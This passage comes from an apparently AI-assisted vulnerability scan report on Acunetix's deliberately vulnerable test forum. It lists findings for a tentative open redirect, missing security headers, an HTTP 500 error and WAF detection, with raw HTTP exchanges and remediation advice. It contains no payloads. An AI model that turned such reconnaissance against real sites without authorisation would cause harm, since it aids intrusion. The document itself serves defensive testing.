	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

An open redirection vulnerability arises when an application incorporates user-controllable input into the target of a redirect without validating that the destination is permitted. An attacker crafts a link to the trusted application that transparently forwards the victim to an attacker-controlled site.

Open redirects are most damaging when leveraged in phishing - the link bears the trusted domain, lending credibility to credential-harvesting pages - and as a building block in OAuth token theft and to bypass URL allow-lists in other controls. Severity is usually medium, higher where it enables token/credential theft.

Remediation

Remove user control over the redirect destination:

  • Avoid user-supplied redirect targets. Where a return location is needed, store it server-side or map a short, validated token to a fixed URL.
  • Allow-list destinations - validate the target against a list of permitted URLs/paths; for same-site navigation accept only relative paths and reject absolute URLs, protocol-relative (//host) and scheme-bearing values.
  • Show an interstitial for any off-site redirect so the user can see where they are being sent.
↩ Glossary47. Suspected open redirect via 'RetURL' return-URL parameter
Severity: Low  |  Confidence: Tentative  |  CWE: CWE-601 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-18 20:28:46
URL
http://testasp.vulnweb.com/Templatize.asp?item=html/about.html
Detail
The response body contains login and register links that carry a RetURL parameter holding a URL-encoded destination (%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml). Return-URL parameters that are used to redirect after authentication commonly fail to validate the target, allowing an attacker to craft a link that redirects the victim to an external malicious site. This is inferred from the response markup rather than confirmed against the redirect endpoint.
AI Confidence
58%
Evidence
<a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a>
HTTP Request
Full request
GET /Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=NLILKFOBIKABBNEPOHMKBOEH; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 00:27:56 GMT
Connection: close
Content-Length: 4594


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>Untitled Document</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		<h1>About this website</h1>
<p>The website was built with the intention to test the Acunetix Web Vulnerability
Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate
the forementioned software's capabilities to find those bugs.</p>
<p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive
information on this site. This includes e-mail addresses or real names.</b></p>
<h1>About Acunetix</h1>
<P><B>Combating the web vulnerability threat<BR>
	</B>Securing a company's web applications is today's most overlooked aspect of 
	securing the enterprise. Web application hacking is on the rise with as many as 
	75% of cyber attacks done at web application level or via the web. Most 
	corporations have secured their data at the network level, but have overlooked 
	the crucial step of checking whether their web applications are vulnerable to 
	attack. Web applications, which often have a direct line into the company's 
	most valuable data assets, are online 24/7, completely unprotected by a 
	firewall and therefore easy prey for attackers.</P>
<P>Acunetix was founded with this threat in mind. We realised the only way to 
	combat web site hacking was to develop an automated tool that could help 
	companies scan their web applications for vulnerabilities. In July 2005, 
	Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
	website for vulnerabilities to SQL injection, cross site scripting and other 
	web attacks before hackers do.</P>
<P>The Acunetix development team consists of highly experienced security developers 
	who have each spent years developing network security scanning software prior 
	to starting development on Acunetix WVS. The management team is backed by years 
	of experience marketing and selling security software.</P>
<P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm">
		offices</A> in Malta, US and the UK.<BR>
</P>
		<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

An open redirection vulnerability arises when an application incorporates user-controllable input into the target of a redirect without validating that the destination is permitted. An attacker crafts a link to the trusted application that transparently forwards the victim to an attacker-controlled site.

Open redirects are most damaging when leveraged in phishing - the link bears the trusted domain, lending credibility to credential-harvesting pages - and as a building block in OAuth token theft and to bypass URL allow-lists in other controls. Severity is usually medium, higher where it enables token/credential theft.

Remediation

Remove user control over the redirect destination:

  • Avoid user-supplied redirect targets. Where a return location is needed, store it server-side or map a short, validated token to a fixed URL.
  • Allow-list destinations - validate the target against a list of permitted URLs/paths; for same-site navigation accept only relative paths and reject absolute URLs, protocol-relative (//host) and scheme-bearing values.
  • Show an interstitial for any off-site redirect so the user can see where they are being sent.

Low CWE-693 - Protection Mechanism Failure 1 finding

↩ Glossary48. Missing security response headers
Severity: Low  |  Confidence: Firm  |  CWE: CWE-693 [ref]  |  OWASP: A05:2021  |  Discovered: 2026-07-18 19:43:18
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=test
Detail
The response omits standard hardening headers such as Content-Security-Policy, X-Content-Type-Options, X-Frame-Options, and Strict-Transport-Security. Their absence weakens browser-side defences against XSS, MIME sniffing, clickjacking, and protocol downgrade for this application.
AI Confidence
80%
Evidence
response_headers contain no Content-Security-Policy, X-Content-Type-Options, X-Frame-Options, or Strict-Transport-Security
HTTP Request
Full request
GET /Search.asp?tfSearch=test HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:41:46 GMT
Content-Length: 2964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for 'test'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

This finding concerns a security misconfiguration - for example a missing or weak security response header, an insecure default left enabled, unnecessary features or sample content exposed, or overly permissive settings. Such protection-mechanism gaps make the application easier to attack: missing headers like Content-Security-Policy, X-Content-Type-Options, Strict-Transport-Security, and a restrictive frame policy remove browser-side defences that mitigate XSS, MIME-sniffing, downgrade, and clickjacking attacks.

Severity is usually low to medium on its own, but misconfiguration widens the blast radius of other vulnerabilities and is a top OWASP Top 10 (2021) category - A05: Security Misconfiguration.

Remediation

Harden configuration and add the missing controls:

  • Set the relevant security headers: a strict Content-Security-Policy, X-Content-Type-Options: nosniff, Strict-Transport-Security, a frame-ancestors / X-Frame-Options policy, and a sensible Referrer-Policy.
  • Remove default accounts, sample apps, and unused features; disable verbose banners and directory listing.
  • Apply a repeatable, least-privilege hardening baseline across environments and keep components patched.

Information CWE-209 - Information Exposure Through an Error Message 1 finding

↩ Glossary49. Internal Server Error Triggered by Benign Form Submission
Severity: Information  |  Confidence: Tentative  |  CWE: CWE-209 [ref]  |  OWASP: A05:2021  |  Discovered: 2026-07-19 14:13:37
URL
http://testasp.vulnweb.com/showforum.asp?id=2
Detail
A benign POST containing 'tfSubject=test&tfText=test' returns HTTP 500 with a generic IIS 'Internal server error' page, indicating an unhandled server-side exception on the message-handling endpoint. While the page itself does not leak a stack trace, an unexpected 500 on well-formed input suggests fragile input handling that may be probed further (e.g. for injection or missing-parameter faults).
AI Confidence
65%
Evidence
status: 500 ; response_body contains '500 - Internal server error.' and 'There is a problem with the resource you are looking for'
HTTP Request
Full request
POST /showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com
Content-Length: 26
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://testasp.vulnweb.com
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/showforum.asp?id=2
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

tfSubject=test&tfText=test
HTTP Response
Full response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 18:09:35 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>500 - Internal server error.</h2>
  <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
 </fieldset></div>
</div>
</body>
</html>
Issue Background

The application returned a verbose error message containing internal implementation detail - a stack trace, database error, framework exception, or server path. Generation of an error message that exposes such detail gives an attacker information about the technology stack, file paths, queries, and code structure that materially assists the discovery and exploitation of other vulnerabilities (for example confirming a SQL injection point or revealing a traversal-reachable path).

On its own this is typically low severity, but it is a reliable force multiplier for higher-impact attacks and indicates error handling that fails open.

Remediation

Fail closed and keep diagnostics server-side:

  • Return generic error pages to clients (a reference id is fine); never expose stack traces, SQL/engine errors, or file paths.
  • Disable debug mode and detailed error display in production configuration for the application and the web/app server.
  • Log full detail server-side for diagnostics, correlated by the client-facing reference id.
  • Handle exceptions consistently so no unhandled path leaks a default verbose page.

Information Uncategorized 1 finding

↩ Glossary50. WAF Detected: F5
Severity: Information  |  Confidence: Firm  |  CWE: n/a  |  OWASP: n/a  |  Discovered: 2026-07-19 13:41:22
URL
http://testasp.vulnweb.com/showthread.asp?id=1
Detail
(no detail captured)

References

CWE

OWASP Top 10

Further Reading